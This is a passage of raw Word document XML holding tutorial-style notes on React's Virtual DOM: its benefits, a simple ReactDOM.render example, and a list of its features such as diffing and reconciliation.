          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>changed elements</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are re-rendered, instead of the entire page. This results in faster updates, especially in large-scale applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671DF09" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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c. Declarative UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49863DFA"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React’s declarative nature allows developers to define </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the UI should look like at any given time. React takes care of efficiently updating the UI when the underlying data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E047444" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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d. Cross-Platform Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED2361"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The Virtual DOM allows React to render applications not just in the browser, but also on other platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Native</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mobile devices. The Virtual DOM is used across platforms, making it easier to develop for multiple environments with consistent performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63730F70" w14:textId="77777777" w:rsidR="00207321"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7058C86">
          <v:rect id="_x0000_i3546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024154D" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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4. Simplified Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13520E1B" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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Initial State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3E133"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st element = &lt;h1&gt;Hello, world!&lt;/h1&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20132EA1"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actDOM.render(element, document.getElementById('root'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0ACCF"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Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React creates an in-memory Virtual DOM with the structure &lt;h1&gt;Hello, world!&lt;/h1&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E223E45"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Real DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is then compared to the actual DOM (the browser's DOM), and since this is the first render, React updates the real DOM by adding the &lt;h1&gt; element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB91F8" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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After State Update (e.g., after a user clicks a button)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB93B7"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st element = &lt;h1&gt;Goodbye, world!&lt;/h1&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE84EF"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actDOM.render(element, document.getElementById('root'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE9A2A"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Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React generates a new Virtual DOM with the updated structure &lt;h1&gt;Goodbye, world!&lt;/h1&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D3930"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Diffing</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React compares the previous Virtual DOM (&lt;h1&gt;Hello, world!&lt;/h1&gt;) to the new one (&lt;h1&gt;Goodbye, world!&lt;/h1&gt;). The difference is identified: the text inside the &lt;h1&gt; element has changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37D110"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Update Real DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React then updates the real DOM by changing the content of the &lt;h1&gt; element to Goodbye, world!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C187E" w14:textId="77777777" w:rsidR="00207321"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AECD5E9">
          <v:rect id="_x0000_i3547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C249722" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="0020732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lastRenderedPageBreak/>
        <w:t>5. How Virtual DOM Helps React:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6A27B"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Minimal DOM Manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of re-rendering the entire DOM every time the state changes, React uses the Virtual DOM to figure out the differences and only applies changes where necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49542C30"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Fast Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach speeds up rendering significantly, especially for complex applications with frequent updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D300FAB" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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Predictable Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Because React performs all updates in a controlled manner, the process is </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>predictable</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, reducing potential bugs or inconsistencies in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5F1FA" w14:textId="77777777" w:rsidR="00207321"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AD70E55">
          <v:rect id="_x0000_i3548" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1025F" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4EEC5" w14:textId="77777777" w:rsidR="00207321" w:rsidRPr="00CE4B95" w:rsidRDefault="00207321" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a key concept in React that improves the performance of the application by minimizing direct interactions with the real DOM. By using an efficient diffing algorithm and only updating the necessary parts of the real DOM, React ensures that UI updates are fast and efficient, even in complex applications. This makes React one of the most efficient libraries for building dynamic user interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA1F6A" w14:textId="2A3E7C95" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="20A9B982">
          <v:rect id="_x0000_i3549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6216E6" w14:textId="45BA8884" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="009B0E0F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="874" w:name="_Toc196308354"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Features of Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="874"/>
    </w:p>
    <w:p w14:paraId="3A582158" w14:textId="34029482" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (VDOM) is a key feature of React and other modern UI frameworks. It provides various benefits that enhance the performance and efficiency of rendering UIs. Below are the primary features of the Virtual DOM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62040C47" w14:textId="77777777" w:rsidR="008975B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149C2F4">
          <v:rect id="_x0000_i3550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5057DB6E"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 Efficient Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5589EA6B"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The Virtual DOM minimizes the number of updates to the real DOM by only applying changes where necessary. Instead of re-rendering the entire UI when something changes, React creates a Virtual DOM tree, compares it to the previous version (using the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), and then updates only the changed parts of the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2F472"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>faster rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a more </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>responsive application</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, especially for large-scale apps with frequent updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519890A1" w14:textId="77777777" w:rsidR="008975B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5C8DCC4">
          <v:rect id="_x0000_i3551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F15ACF"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2. Reconciliation Algorithm (Diffing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35ADBD"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The Virtual DOM allows React to compare (or "diff") the current Virtual DOM with the previous one to identify changes. This process is known as </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reconciliation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1856ECC7"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React performs a shallow comparison of the old and new Virtual DOM trees and determines the minimum set of changes to apply to the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C63BD9"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps optimize performance by only updating the parts of the UI that have changed, rather than re-rendering everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2DE75" w14:textId="77777777" w:rsidR="008975B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5CA01AE">
          <v:rect id="_x0000_i3552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CF431"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3. Declarative UI Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6740AC6D"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With the Virtual DOM, developers specify </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what the UI should look like</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for any given state, and React takes care of efficiently updating the UI when the state changes. This declarative approach makes UI updates more predictable and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723CD61"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach reduces complexity and avoids side effects in the UI, allowing developers to focus on business logic and state management rather than manual DOM manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738ADEC6" w14:textId="77777777" w:rsidR="008975B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1AF25B6">
          <v:rect id="_x0000_i3553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31913848"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4. Component-Based Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2900CB"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In React, the Virtual DOM works seamlessly with React’s </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component-based architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each component has its own state and renders based on that state, with the Virtual DOM representing the component’s rendered output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F102F08"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This modular approach improves code maintainability and reusability. It also enables the Virtual DOM to optimize the rendering of individual components without affecting the whole page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE92418" w14:textId="77777777" w:rsidR="008975B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746851E">
          <v:rect id="_x0000_i3554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A6C8F"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5. Cross-Platform Rendering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C37A7F"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he Virtual DOM abstracts the UI rendering layer, which allows React to work not just for web applications, but also for mobile apps (via React Native) and even virtual reality (via React VR). The Virtual DOM ensures that rendering logic can be applied uniformly across different platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F3E18"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-platform compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows developers to write code once and have it run across different platforms with minimal changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DDE09" w14:textId="77777777" w:rsidR="008975B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76DAD1B">
          <v:rect id="_x0000_i3555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BC568"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6. Faster Repaints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50DADB"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lastRenderedPageBreak/>
        <w:t>By calculating the differences in the Virtual DOM before applying them to the real DOM, React can update only the affected areas. This results in faster repaints and reduces browser reflows, which are typically expensive operations in terms of performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8E69E"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Benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reduced reflows</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
